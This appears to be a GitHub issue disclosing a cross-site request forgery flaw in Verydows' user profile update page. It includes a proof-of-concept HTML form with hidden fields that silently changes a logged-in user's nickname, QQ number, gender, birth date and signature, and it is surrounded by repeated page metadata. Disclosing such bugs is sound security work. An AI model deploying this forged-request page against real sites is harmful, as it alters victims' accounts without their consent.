Existence CSRF Vulnerability

There is a CSRF vulnerability that allows information and other operations to be changed
[http://dcbang.net/QQ.PNG](url)

POC:
`<html>
  
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://demo.verydows.com/user/profile.html?step=update" method="POST">
      <input type="hidden" name="nickname" value="é&#169;&#172;?&#164;&#167;?&#147;&#136;" />
      <input type="hidden" name="qq" value="1332597938" />
      <input type="hidden" name="gender" value="0" />
      <input type="hidden" name="birth&#95;year" value="1920" />
      <input type="hidden" name="birth&#95;month" value="1" />
      <input type="hidden" name="birth&#95;day" value="1" />
      <input type="hidden" name="signature" value="AA" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
`

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Existence CSRF Vulnerability #17

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Existence CSRF Vulnerability #17

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions